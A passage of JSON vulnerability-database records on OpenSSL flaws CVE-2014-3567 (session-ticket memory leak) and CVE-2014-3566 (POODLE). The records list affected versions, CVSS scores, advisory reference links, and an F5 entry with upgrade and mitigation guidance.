"NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-3567"], "scanner": [], "cpe": ["cpe:/a:openssl:openssl:1.0.0k", "cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:0.9.8zb", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:1.0.1:beta2", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.0:beta3", "cpe:/a:openssl:openssl:1.0.0:beta1", "cpe:/a:openssl:openssl:1.0.0a", "cpe:/a:openssl:openssl:1.0.1g", "cpe:/a:openssl:openssl:1.0.0h", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:1.0.1h", "cpe:/a:openssl:openssl:1.0.0l", "cpe:/a:openssl:openssl:1.0.0:beta4", "cpe:/a:openssl:openssl:1.0.0", "cpe:/a:openssl:openssl:1.0.0i", "cpe:/a:openssl:openssl:1.0.0f", "cpe:/a:openssl:openssl:1.0.1:beta3", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.0e", "cpe:/a:openssl:openssl:1.0.0g", "cpe:/a:openssl:openssl:1.0.1i", "cpe:/a:openssl:openssl:1.0.0j", "cpe:/a:openssl:openssl:1.0.1:beta1", "cpe:/a:openssl:openssl:1.0.0b", "cpe:/a:openssl:openssl:1.0.0d", "cpe:/a:openssl:openssl:1.0.1f", "cpe:/a:openssl:openssl:1.0.0m", "cpe:/a:openssl:openssl:1.0.0:beta2", "cpe:/a:openssl:openssl:1.0.0n", "cpe:/a:openssl:openssl:1.0.0:beta5", "cpe:/a:openssl:openssl:1.0.0c"], "modified": "2017-11-14T21:29:04", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3567", "id": "CVE-2014-3567", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-01T05:14:34", "references": ["https://www-01.ibm.com/support/docview.wss?uid=swg21688165", "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html", "http://www-01.ibm.com/support/docview.wss?uid=swg21687172", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html", "http://support.citrix.com/article/CTX200238", "http://www-01.ibm.com/support/docview.wss?uid=swg21687611", "http://www.securitytracker.com/id/1031105", "http://downloads.asterisk.org/pub/security/AST-2014-011.html", "http://marc.info/?l=bugtraq&m=142354438527235&w=2", "http://marc.info/?l=bugtraq&m=142721887231400&w=2", "http://marc.info/?l=bugtraq&m=142350743917559&w=2", "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle", "http://www.securitytracker.com/id/1031132", "http://rhn.redhat.com/errata/RHSA-2015-1546.html", "https://support.citrix.com/article/CTX216642", "https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip", "http://marc.info/?l=bugtraq&m=141715130023061&w=2", "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html", "http://www.securityfocus.com/archive/1/533724/100/0/threaded", "http://archives.neohapsis.com/archives/bugtraq/2014-10/0101.html", "http://www.securitytracker.com/id/1031107", "https://support.apple.com/HT205217", "https://support.apple.com/kb/HT6536", "http://rhn.redhat.com/errata/RHSA-2014-1877.html", "http://www.vmware.com/security/advisories/VMSA-2015-0003.html", "https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/", "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html", "http://marc.info/?l=bugtraq&m=141813976718456&w=2", "http://marc.info/?l=bugtraq&m=142624679706236&w=2", "http://marc.info/?l=bugtraq&m=143290583027876&w=2", "http://archives.neohapsis.com/archives/bugtraq/2014-10/0103.html", "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6", "http://www.securitytracker.com/id/1031029", "http://www.debian.org/security/2014/dsa-3053", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00033.html", "http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10705", "http://marc.info/?l=bugtraq&m=142962817202793&w=2", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04819635", "http://rhn.redhat.com/errata/RHSA-2015-0079.html", "http://www.securitytracker.com/id/1031093", "https://github.com/mpgn/poodle-PoC", "http://marc.info/?l=bugtraq&m=142624619906067", "http://rhn.redhat.com/errata/RHSA-2014-1881.html", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00024.html", "http://marc.info/?l=bugtraq&m=141477196830952&w=2", "http://www.debian.org/security/2016/dsa-3489", "http://marc.info/?l=openssl-dev&m=141333049205629&w=2", "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00018.html", "https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html", "http://www.securitytracker.com/id/1031123", "https://bugzilla.mozilla.org/show_bug.cgi?id=1076983", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05157667", "http://marc.info/?l=bugtraq&m=144101915224472&w=2", "http://www.securitytracker.com/id/1031124", "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169374.html", "http://marc.info/?l=bugtraq&m=141620103726640&w=2", "http://www.securitytracker.com/id/1031095", "https://www.openssl.org/news/secadv_20141015.txt", "https://security.netapp.com/advisory/ntap-20141015-0001/", "http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-3566.html", "http://rhn.redhat.com/errata/RHSA-2015-0698.html", "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html", "http://www.ubuntu.com/usn/USN-2487-1", "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021431", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00036.html", "http://marc.info/?l=bugtraq&m=141450973807288&w=2", "http://marc.info/?l=bugtraq&m=142791032306609&w=2", "http://lists.apple.com/archives/security-announce/2015/Jan/msg00003.html", "http://marc.info/?l=bugtraq&m=143039249603103&w=2", "http://marc.info/?l=bugtraq&m=142103967620673&w=2", "http://marc.info/?l=bugtraq&m=143290437727362&w=2", "http://www.debian.org/security/2015/dsa-3253", "http://lists.apple.com/archives/security-announce/2015/Sep/msg00002.html", "http://marc.info/?l=bugtraq&m=142546741516006&w=2", "http://marc.info/?l=bugtraq&m=142350196615714&w=2", "http://marc.info/?l=bugtraq&m=143290522027658&w=2", "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", "http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html", "http://www.securityfocus.com/archive/1/533747", "https://support.apple.com/kb/HT6529", "http://advisories.mageia.org/MGASA-2014-0416.html", "http://marc.info/?l=bugtraq&m=141697676231104&w=2", "https://security.gentoo.org/glsa/201606-11", "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html", "http://rhn.redhat.com/errata/RHSA-2014-1876.html", "http://www.us-cert.gov/ncas/alerts/TA14-290A", "http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04779034", "http://lists.fedoraproject.org/pipermail/package-announce/2014-November/142330.html", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00021.html", "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00027.html", "http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html", "http://marc.info/?l=bugtraq&m=141697638231025&w=2", "https://www.elastic.co/blog/logstash-1-4-3-released", "http://support.apple.com/HT204244", "http://www.securitytracker.com/id/1031086", "http://marc.info/?l=bugtraq&m=141577350823734&w=2", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05301946", "https://security.gentoo.org/glsa/201507-14", "http://marc.info/?l=bugtraq&m=142660345230545&w=2", "http://www.securitytracker.com/id/1031096", "http://marc.info/?l=bugtraq&m=142624719706349&w=2", "https://kc.mcafee.com/corporate/index?page=content&id=SB10090", "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html", "https://support.lenovo.com/product_security/poodle", "http://rhn.redhat.com/errata/RHSA-2015-0085.html", "http://www.kb.cert.org/vuls/id/577193", "http://marc.info/?l=bugtraq&m=141814011518700&w=2", "http://www.mandriva.com/security/advisories?name=MDVSA-2014:203", "http://www-01.ibm.com/support/docview.wss?uid=swg21692299", "http://www.securitytracker.com/id/1031131", "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0", "http://marc.info/?l=bugtraq&m=143628269912142&w=2", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00026.html", "http://marc.info/?l=bugtraq&m=141450452204552&w=2", "http://www-01.ibm.com/support/docview.wss?uid=swg21686997", "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html", "https://support.apple.com/kb/HT6535", "http://rhn.redhat.com/errata/RHSA-2015-0086.html", "http://marc.info/?l=bugtraq&m=143290371927178&w=2", "http://marc.info/?l=bugtraq&m=141879378918327&w=2", "http://rhn.redhat.com/errata/RHSA-2014-1882.html", "http://marc.info/?l=bugtraq&m=142607790919348&w=2", "http://marc.info/?l=bugtraq&m=142721830231196&w=2", "http://marc.info/?l=bugtraq&m=142496355704097&w=2", "https://support.apple.com/kb/HT6527", "http://rhn.redhat.com/errata/RHSA-2015-0068.html", "http://marc.info/?l=bugtraq&m=142357976805598&w=2", "http://marc.info/?l=bugtraq&m=141577087123040&w=2", "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00001.html", "http://rhn.redhat.com/errata/RHSA-2014-1948.html", "http://marc.info/?l=bugtraq&m=142118135300698&w=2", "http://www.securityfocus.com/archive/1/533746", "http://www.securitytracker.com/id/1031094", "http://www.securitytracker.com/id/1031039", "https://support.apple.com/kb/HT6542", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05068681", "http://www.securitytracker.com/id/1031090", "http://marc.info/?l=bugtraq&m=143558137709884&w=2", "https://puppet.com/security/cve/poodle-sslv3-vulnerability", "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00066.html", "http://marc.info/?l=bugtraq&m=142805027510172&w=2", "http://marc.info/?l=bugtraq&m=144294141001552&w=2", "http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04583581", "http://www.securitytracker.com/id/1031089", "http://rhn.redhat.com/errata/RHSA-2015-1545.html", "http://www.debian.org/security/2015/dsa-3144", "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141114.html", "http://marc.info/?l=bugtraq&m=143558192010071&w=2", "http://marc.info/?l=bugtraq&m=141694355519663&w=2", "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/169361.html", "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00002.html", "http://www.securitytracker.com/id/1031092", "http://www.securityfocus.com/bid/70574", "https://access.redhat.com/articles/1232123", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://rhn.redhat.com/errata/RHSA-2014-1692.html", "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-405500.htm", "http://www.securitytracker.com/id/1031130", "http://marc.info/?l=bugtraq&m=141703183219781&w=2", "http://www.securitytracker.com/id/1031088", "http://www.debian.org/security/2015/dsa-3147", "http://marc.info/?l=bugtraq&m=144251162130364&w=2", "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html", "http://blogs.technet.com/b/msrc/archive/2014/10/14/security-advisory-3009008-released.aspx", "http://www.securitytracker.com/id/1031106", "http://marc.info/?l=bugtraq&m=142740155824959&w=2", "http://askubuntu.com/questions/537196/how-do-i-patch-workaround-sslv3-poodle-vulnerability-cve-2014-3566", "ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2014-015.txt.asc", "https://bto.bluecoat.com/security-advisory/sa83", "http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/", "https://groups.google.com/forum/#!topic/docker-user/oYm0i3xShJU", "http://lists.fedoraproject.org/pipermail/package-announce/2014-October/141158.html", "http://rhn.redhat.com/errata/RHSA-2014-1920.html", "http://docs.ipswitch.com/MOVEit/DMZ82/ReleaseNotes/MOVEitReleaseNotes82.pdf", "http://marc.info/?l=bugtraq&m=142495837901899&w=2", "https://support.lenovo.com/us/en/product_security/poodle", "http://www-01.ibm.com/support/docview.wss?uid=isg3T1021439", "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html", "http://www.securitytracker.com/id/1031087", "https://technet.microsoft.com/library/security/3009008.aspx", "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc", "http://www.ubuntu.com/usn/USN-2486-1", "http://rhn.redhat.com/errata/RHSA-2015-0264.html", "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html", "http://marc.info/?l=bugtraq&m=141576815022399&w=2", "http://marc.info/?l=bugtraq&m=145983526810210&w=2", "http://rhn.redhat.com/errata/RHSA-2014-1880.html", "http://marc.info/?l=bugtraq&m=141628688425177&w=2", "http://marc.info/?l=bugtraq&m=142624619906067&w=2", "http://marc.info/?l=bugtraq&m=142624590206005&w=2", "http://marc.info/?l=bugtraq&m=142350298616097&w=2", "http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html", "http://www.securitytracker.com/id/1031120", "http://marc.info/?l=bugtraq&m=143101048219218&w=2", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1152789", "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00000.html", "http://rhn.redhat.com/errata/RHSA-2015-0080.html", "http://rhn.redhat.com/errata/RHSA-2014-1653.html", "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html", "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://marc.info/?l=bugtraq&m=142296755107581&w=2", "http://www.securitytracker.com/id/1031091", "http://rhn.redhat.com/errata/RHSA-2014-1652.html", "http://marc.info/?l=bugtraq&m=142804214608580&w=2", "https://support.apple.com/kb/HT6541", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "http://www.securitytracker.com/id/1031085", "https://www.suse.com/support/kb/doc.php?id=7015773", "https://kc.mcafee.com/corporate/index?page=content&id=SB10091", "http://marc.info/?l=bugtraq&m=141775427104070&w=2", "https://kc.mcafee.com/corporate/index?page=content&id=SB10104", "https://support.apple.com/kb/HT6531", "http://www-01.ibm.com/support/docview.wss?uid=swg21688283"], "description": "The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue.", "edition": 12, "reporter": "NVD", "published": "2014-10-14T20:55:02", "title": "CVE-2014-3566", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-3566"], "scanner": [], "modified": "2018-10-30T12:27:34", "cpe": ["cpe:/a:oracle:database:11.2.0.4", "cpe:/o:netbsd:netbsd:5.1", "cpe:/a:openssl:openssl:1.0.0k", "cpe:/a:openssl:openssl:0.9.8y", "cpe:/a:openssl:openssl:0.9.8m", "cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:0.9.8n", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:7.0", "cpe:/a:openssl:openssl:0.9.8b", "cpe:/a:openssl:openssl:0.9.8h", "cpe:/a:openssl:openssl:0.9.8za", "cpe:/a:openssl:openssl:0.9.8zb", "cpe:/a:openssl:openssl:0.9.8u", "cpe:/o:netbsd:netbsd:6.0.2", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:0.9.8w", "cpe:/a:openssl:openssl:0.9.8k", "cpe:/o:netbsd:netbsd:6.1", "cpe:/a:openssl:openssl:1.0.1:beta2", "cpe:/o:ibm:vios:2.2.3.0", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:novell:suse_linux_enterprise_desktop:10.0", "cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:0.9.8j", "cpe:/a:openssl:openssl:0.9.8t", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.0:beta3", "cpe:/a:openssl:openssl:1.0.0:beta1", "cpe:/o:ibm:vios:2.2.2.4", "cpe:/o:novell:suse_linux_enterprise_server:11.0:sp3", "cpe:/o:ibm:aix:6.1", "cpe:/o:novell:suse_linux_enterprise_desktop:9.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/o:ibm:vios:2.2.0.11", "cpe:/o:ibm:vios:2.2.0.12", "cpe:/a:openssl:openssl:0.9.8a", "cpe:/o:ibm:vios:2.2.1.7", "cpe:/o:fedoraproject:fedora:19", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:openssl:openssl:0.9.8q", "cpe:/o:novell:suse_linux_enterprise_desktop:11.0", "cpe:/a:openssl:openssl:1.0.0a", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:netbsd:netbsd:6.0.6", "cpe:/o:ibm:vios:2.2.2.0", "cpe:/a:openssl:openssl:1.0.1g", "cpe:/o:ibm:vios:2.2.1.3", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:netbsd:netbsd:6.1.1", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:76.0", "cpe:/o:novell:suse_linux_enterprise_server:11.0:sp3:~~~vmware~~", "cpe:/o:fedoraproject:fedora:21", "cpe:/o:ibm:vios:2.2.1.9", "cpe:/a:openssl:openssl:0.9.8z", "cpe:/o:ibm:vios:2.2.1.0", "cpe:/a:openssl:openssl:0.9.8o", "cpe:/a:openssl:openssl:1.0.0h", "cpe:/o:ibm:vios:2.2.1.5", "cpe:/a:openssl:openssl:0.9.8x", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:netbsd:netbsd:5.1.1", "cpe:/o:ibm:vios:2.2.2.3", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:11.0:sp3", "cpe:/o:netbsd:netbsd:5.2.2", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/o:netbsd:netbsd:6.0", "cpe:/o:ibm:vios:2.2.2.5", "cpe:/a:openssl:openssl:1.0.1h", "cpe:/a:openssl:openssl:0.9.8s", "cpe:/o:ibm:aix:7.1", "cpe:/o:netbsd:netbsd:6.1.2", "cpe:/a:openssl:openssl:1.0.0l", "cpe:/a:oracle:database:12.1.0.2", "cpe:/o:netbsd:netbsd:6.0.4", "cpe:/o:ibm:vios:2.2.0.10", "cpe:/o:netbsd:netbsd:6.1.5", "cpe:/o:netbsd:netbsd:5.2", "cpe:/a:openssl:openssl:1.0.0:beta4", "cpe:/o:netbsd:netbsd:6.0.3", "cpe:/a:openssl:openssl:0.9.8f", "cpe:/a:openssl:openssl:0.9.8", "cpe:/a:openssl:openssl:1.0.0", "cpe:/a:openssl:openssl:1.0.0i", "cpe:/a:openssl:openssl:0.9.8i", "cpe:/a:openssl:openssl:1.0.0f", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:openssl:openssl:0.9.8m:beta1", "cpe:/o:ibm:vios:2.2.2.1", "cpe:/o:ibm:vios:2.2.1.6", "cpe:/a:openssl:openssl:0.9.8c", "cpe:/o:ibm:vios:2.2.3.3", "cpe:/a:openssl:openssl:1.0.1:beta3", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.0e", "cpe:/o:fedoraproject:fedora:20", "cpe:/a:openssl:openssl:1.0.0g", "cpe:/a:openssl:openssl:0.9.8r", "cpe:/o:ibm:vios:2.2.3.2", "cpe:/o:netbsd:netbsd:6.0:beta", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/o:ibm:vios:2.2.1.8", "cpe:/a:openssl:openssl:1.0.1i", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:ibm:vios:2.2.3.4", "cpe:/a:openssl:openssl:1.0.0j", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:mageia:mageia:4.0", "cpe:/o:netbsd:netbsd:5.2.1", "cpe:/o:netbsd:netbsd:6.1.3", "cpe:/a:openssl:openssl:1.0.1:beta1", "cpe:/o:netbsd:netbsd:5.1.4", "cpe:/a:openssl:openssl:1.0.0b", "cpe:/o:ibm:vios:2.2.1.1", "cpe:/a:openssl:openssl:0.9.8d", "cpe:/o:redhat:enterprise_linux_server_supplementary:7.0", "cpe:/o:netbsd:netbsd:6.0.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:netbsd:netbsd:5.1.2", "cpe:/a:openssl:openssl:0.9.8v", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/a:openssl:openssl:1.0.0d", "cpe:/o:netbsd:netbsd:6.1.4", "cpe:/a:openssl:openssl:1.0.1f", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/a:openssl:openssl:1.0.0m", "cpe:/o:ibm:vios:2.2.1.4", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:ibm:aix:5.3", "cpe:/o:ibm:vios:2.2.0.13", "cpe:/o:ibm:vios:2.2.2.2", "cpe:/o:mageia:mageia:3.0", "cpe:/a:openssl:openssl:1.0.0:beta2", "cpe:/a:openssl:openssl:1.0.0n", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:openssl:openssl:1.0.0:beta5", "cpe:/o:ibm:vios:2.2.3.1", "cpe:/a:openssl:openssl:0.9.8e", "cpe:/a:openssl:openssl:0.9.8g", "cpe:/a:openssl:openssl:1.0.0c", "cpe:/o:netbsd:netbsd:6.0.1", "cpe:/o:apple:mac_os_x:10.10.1", "cpe:/a:openssl:openssl:0.9.8l", "cpe:/o:opensuse:opensuse:12.3", "cpe:/o:netbsd:netbsd:5.1.3", "cpe:/a:openssl:openssl:0.9.8p"], "id": "CVE-2014-3566", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openssl": [{"lastseen": "2016-09-26T17:22:34", "references": [], "edition": 1, "description": "When an OpenSSL SSL/TLS/DTLS server receives a session ticket the integrity of that ticket is first verified. In the event of a session ticket integrity check failing, OpenSSL will fail to free memory causing a memory leak. By sending a large number of invalid session tickets an attacker could exploit this issue in a Denial Of Service attack.", "reporter": "OpenSSL", "published": "2014-10-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2014-3567)", "bulletinFamily": "software", "affectedSoftware": [{"name": "openssl", "version": "1.0.0d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8p", "operator": "eq"}, {"name": "openssl", "version": "1.0.0b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8q", "operator": "eq"}, {"name": "openssl", "version": "1.0.1c", "operator": "eq"}, {"name": "openssl", "version": "1.0.0", "operator": "eq"}, {"name": "openssl", "version": "0.9.8t", "operator": "eq"}, {"name": "openssl", "version": "1.0.0e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8w", "operator": "eq"}, {"name": "openssl", "version": "1.0.0a", "operator": "eq"}, {"name": "openssl", "version": "1.0.1b", "operator": "eq"}, {"name": "openssl", "version": "0.9.8o", "operator": "eq"}, {"name": "openssl", "version": "0.9.8j", "operator": "eq"}, {"name": "openssl", "version": "1.0.0j", "operator": "eq"}, {"name": "openssl", "version": "0.9.8l", "operator": "eq"}, {"name": "openssl", "version": "1.0.0k", "operator": "eq"}, {"name": "openssl", "version": "0.9.8n", "operator": "eq"}, {"name": "openssl", "version": "1.0.1a", "operator": "eq"}, {"name": "openssl", "version": "1.0.1d", "operator": "eq"}, {"name": "openssl", "version": "0.9.8i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8g", "operator": "eq"}, {"name": "openssl", "version": "0.9.8m", "operator": "eq"}, {"name": "openssl", "version": "0.9.8v", "operator": "eq"}, {"name": "openssl", "version": "1.0.0l", "operator": "eq"}, {"name": "openssl", "version": "0.9.8u", "operator": "eq"}, {"name": "openssl", "version": "1.0.1", "operator": "eq"}, {"name": "openssl", "version": "1.0.1f", "operator": "eq"}, {"name": "openssl", "version": "1.0.0n", "operator": "eq"}, {"name": "openssl", "version": "1.0.0m", "operator": "eq"}, {"name": "openssl", "version": "1.0.1i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8x", "operator": "eq"}, {"name": "openssl", "version": "0.9.8s", "operator": "eq"}, {"name": "openssl", "version": "0.9.8r", "operator": "eq"}, {"name": "openssl", "version": "1.0.0c", "operator": "eq"}, {"name": "openssl", "version": "0.9.8zb", "operator": "eq"}, {"name": "openssl", "version": "0.9.8h", "operator": "eq"}, {"name": "openssl", "version": "1.0.0i", "operator": "eq"}, {"name": "openssl", "version": "0.9.8k", "operator": "eq"}, {"name": "openssl", "version": "1.0.1g", "operator": "eq"}, {"name": "openssl", "version": "1.0.0g", "operator": "eq"}, {"name": "openssl", "version": "1.0.1e", "operator": "eq"}, {"name": "openssl", "version": "0.9.8za", "operator": "eq"}, {"name": "openssl", "version": "1.0.1h", "operator": "eq"}, {"name": "openssl", "version": "0.9.8y", "operator": "eq"}, {"name": "openssl", "version": "1.0.0f", "operator": "eq"}], "cvelist": ["CVE-2014-3567"], "modified": "2014-10-15T00:00:00", "id": "OPENSSL:CVE-2014-3567", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "f5": [{"lastseen": "2016-09-26T17:23:06", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/6000/400/sol6462.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nIf you are running a version listed in the** Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists. \n \nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy. \n\n\nTo mitigate these vulnerabilities for affected systems, you can restrict access to the Configuration utility to only trusted networks, and limit login access to only trusted users.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2014-10-21T00:00:00", "title": "SOL15723 - OpenSSL vulnerability CVE-2014-3567", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP ASM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.1 HF5", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1 HF4", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0 HF2", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.0 HF5", "operator": "le"}, {"name": "FirePass", "version": "6.1.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.4.1 HF6", "operator": "le"}, {"name": "BIG-IP Edge Gateway\n", "version": "11.3.0", "operator": "le"}, {"name": "FirePass", "version": "7.0.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.0 HF5", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.1 HF5", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.6.0 HF2", "operator": 